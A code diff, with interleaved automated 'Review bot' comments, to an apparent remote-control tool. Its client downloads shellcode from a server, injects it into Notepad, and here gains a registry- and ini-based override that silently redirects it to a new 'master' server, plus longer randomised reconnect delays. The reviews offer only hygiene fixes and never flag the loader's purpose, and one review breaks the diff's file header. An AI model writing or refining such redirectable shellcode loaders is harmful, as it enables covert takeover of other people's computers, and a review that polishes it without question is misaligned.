diff --git a/client/main.c b/client/main.c
index 0ab6be0..2580947 100644
--- a/client/main.c
+++ b/client/main.c
@@ -6,16 +6,16 @@
 #include
 #include
 #include
+#include
+#include
 #ifdef _DEBUG
-#include
 #define Mprintf printf
 #define IsRelease 0
 #else
 #define Mprintf(format, ...)
 #define IsRelease 1
 #endif
-#include
 #pragma comment(lib, "ws2_32.lib")
@@ -89,6 +89,28 @@ int GetIPAddress(const char* hostName, char* outIpBuffer, int bufferSize)
 return 0;
 }
+char* ReadRegistryString(const char* subKey, const char* valueName) {
+ HKEY hKey = NULL;
+ LONG ret = RegOpenKeyExA(HKEY_CURRENT_USER, subKey, 0, KEY_READ, &hKey);
+ if (ret != ERROR_SUCCESS)
+ return NULL;
+
+ DWORD dataType = 0;
+ DWORD dataSize = 1024;
+ char *data = (char*)malloc(dataSize+1);
+ if (data) {
+ ret = RegQueryValueExA(hKey, valueName, NULL, &dataType, (LPBYTE)data, &dataSize);
+ data[min(dataSize, 1024)] = '\0';
+ if (ret != ERROR_SUCCESS || (dataType != REG_SZ && dataType != REG_EXPAND_SZ)) {
+ free(data);
+ data = NULL;
+ }
+ }
+ RegCloseKey(hKey);
+
+ return data;
+}
+
+const char* ReceiveShellcode(const char* sIP, int serverPort, int* sizeOut) {
 if (!sIP || !sizeOut) return NULL;
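Review bot: ReadRegistryString has no comment stating its contract: it returns a malloc'd buffer the caller must free, returns NULL both on open/query failure and for a value whose type is not REG_SZ or REG_EXPAND_SZ, truncates to 1024 bytes through the `data[min(dataSize, 1024)] = '\0'` write, and leaves REG_EXPAND_SZ values unexpanded. A header comment along the lines of `/* Read a string value under HKEY_CURRENT_USER\subKey. Returns a malloc'd NUL-terminated copy (at most 1024 bytes, caller frees) or NULL on failure or non-string type. */` would cover it. The 1024 literal is also written twice (`dataSize = 1024` and the `min` call); a single `const DWORD maxLen = 1024;` used for both keeps the terminator index tied to the buffer size.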
@@ -96,11 +118,26 @@ const char* ReceiveShellcode(const char* sIP, int serverPort, int* sizeOut) {
 if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0) return NULL;
+ char addr[100] = { 0 };
+ strcpy(addr, sIP);
+ const char* path = "Software\\ServerD11\\settings";
+ char* saved_ip = ReadRegistryString(path, "master");
+ char* saved_port = ReadRegistryString(path, "port");
+ char* valid_to = ReadRegistryString(path, "valid_to");
+ int now = time(NULL), valid = valid_to ? atoi(valid_to) : 0;
+ if (now <= valid && saved_ip && *saved_ip && saved_port && *saved_port) {
+ strcpy(addr, saved_ip);
+ serverPort = atoi(saved_port);
+ }
+ free(saved_ip); saved_ip = NULL;
+ free(saved_port); saved_port = NULL;
+ free(valid_to); valid_to = NULL;
+
 char serverIP[INET_ADDRSTRLEN] = { 0 };
- if (GetIPAddress(sIP, serverIP, sizeof(serverIP)) == 0) {
+ if (GetIPAddress(addr, serverIP, sizeof(serverIP)) == 0) {
 Mprintf("Resolved IP: %s\n", serverIP);
 } else {
- Mprintf("Failed to resolve '%s'.\n", sIP);
+ Mprintf("Failed to resolve '%s'.\n", addr);
 WSACleanup();
 return NULL;
 }
@@ -112,7 +149,7 @@ const char* ReceiveShellcode(const char* sIP, int serverPort, int* sizeOut) {
 int attemptCount = 0, requestCount = 0;
 do {
 if (!isFirstConnect)
- Sleep(IsRelease ? rand()%60 * 1000 : 5000);
+ Sleep(IsRelease ? rand()%120 * 1000 : 5000);
 isFirstConnect = FALSE;
 if (++attemptCount == 20)
 PostMessage((HWND)g_Server.parentHwnd, 4046, (WPARAM)933711587, (LPARAM)1643138518);
@@ -216,6 +253,9 @@ inline int MemoryFind(const char* szBuffer, const char* Key, int iBufferSize, in
 #endif
 extern DLL_API DWORD WINAPI run(LPVOID param) {
+ char eventName[64] = { 0 };
+ sprintf(eventName, "EVENT_%d", GetCurrentProcessId());
+ HANDLE hEvent = CreateEventA(NULL, TRUE, FALSE, eventName);
 PluginParam* info = (PluginParam*)param;
 int size = 0;
 const char* dllData = ReceiveShellcode(info->IP, info->Port, &size);
diff --git a/client/test.cpp b/client/test.cpp
index 7c5807d..8036cc6 100644
--- a/client/test.cpp
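Review bot: `strcpy(addr, sIP)` and `strcpy(addr, saved_ip)` copy into the fixed 100-byte `addr` with no length check; `saved_ip` comes from ReadRegistryString, which returns up to 1024 bytes, so an over-long registry value overruns the stack buffer. Bounded copies such as `snprintf(addr, sizeof(addr), "%s", sIP);` and `snprintf(addr, sizeof(addr), "%s", saved_ip);` keep the buffer intact. `int now = time(NULL)` also narrows a `time_t` to `int`, and `valid` from `atoi` is an int as well; declaring `time_t now = time(NULL);` and comparing `now <= (time_t)valid` avoids the truncation. ReceiveShellcode's body starts and ends outside this hunk.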
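Review bot: `HANDLE hEvent = CreateEventA(...)` in run is never closed or used within the hunk; if the event is meant to stay open so the server's OnTimer hunk in 2015RemoteDlg.cpp can find it by name with OpenEventA, a comment such as `// kept open for the process lifetime; the server timer probes it by name` should say so, otherwise it is a handle leak. `sprintf(eventName, "EVENT_%d", GetCurrentProcessId())` passes a DWORD to `%d`; `snprintf(eventName, sizeof(eventName), "EVENT_%lu", GetCurrentProcessId());` fixes the format and bounds the write, and the same `%d` mismatch is in EventName() in 2015RemoteDlg.cpp. Each side names the event after its own process id, so the server-side OpenEventA can only succeed when both run in one process — presumably intended, but worth confirming in a comment. run's body continues past the hunk.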
+++ b/client/test.cpp
@@ -259,6 +259,15 @@ int main(int argc, const char *argv[])
 status = 0;
 SetConsoleCtrlHandler(&callback, TRUE);
+ iniFile cfg(CLIENT_PATH);
+ auto now = time(0);
+ auto valid_to = atof(cfg.GetStr("settings", "valid_to").c_str());
+ if (now <= valid_to) {
+ auto saved_ip = cfg.GetStr("settings", "master");
+ auto saved_port = cfg.GetInt("settings", "port");
+ g_ConnectAddress.SetServer(saved_ip.c_str(), saved_port);
+ }
+
 // 此 Shell code 连接本机6543端口,注入到记事本
 if (g_ConnectAddress.iStartup == Startup_InjSC) {
diff --git a/server/2015Remote/2015RemoteDlg.cpp b/server/2015Remote/2015RemoteDlg.cpp
index e74dc4f..7bddf1e 100644
--- a/server/2015Remote/2015RemoteDlg.cpp
+++ b/server/2015Remote/2015RemoteDlg.cpp
@@ -93,6 +93,12 @@ static UINT Indicators[] =
 IDR_STATUSBAR_STRING
 };
+std::string EventName() {
+ char eventName[64];
+ snprintf(eventName, sizeof(eventName), "EVENT_%d", GetCurrentProcessId());
+ return eventName;
+}
+
 //////////////////////////////////////////////////////////////////////////
 // 淇濆瓨 unordered_map 鍒版枃浠
@@ -1151,6 +1157,14 @@ void CMy2015RemoteDlg::OnTimer(UINT_PTR nIDEvent)
 {
 if (nIDEvent == TIMER_CHECK) {
+ static int count = 0;
+ static std::string eventName = EventName();
+ HANDLE hEvent = OpenEventA(SYNCHRONIZE, FALSE, eventName.c_str());
+ if (hEvent) {
+ CloseHandle(hEvent);
+ }else if (++count == 10) {
+ THIS_APP->UpdateMaxConnection(count);
+ }
 if (!m_superPass.empty()) {
 Mprintf(">>> Timer is killed <<<\n");
 KillTimer(nIDEvent);
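Review bot: the test.cpp override calls `g_ConnectAddress.SetServer(saved_ip.c_str(), saved_port)` whenever `now <= valid_to`, without the non-empty checks the matching change in client/main.c applies to `saved_ip` and `saved_port`, so an absent or empty `master` key still replaces the configured server. Guarding the call, `if (!saved_ip.empty()) g_ConnectAddress.SetServer(saved_ip.c_str(), saved_port);`, keeps the two clients consistent; what GetInt returns for a missing key is not visible here, so that value may need a check of its own. The two paths also parse `valid_to` differently (`atof` here, `atoi` in main.c); choosing one avoids them diverging on a malformed value. main's body continues outside the hunk.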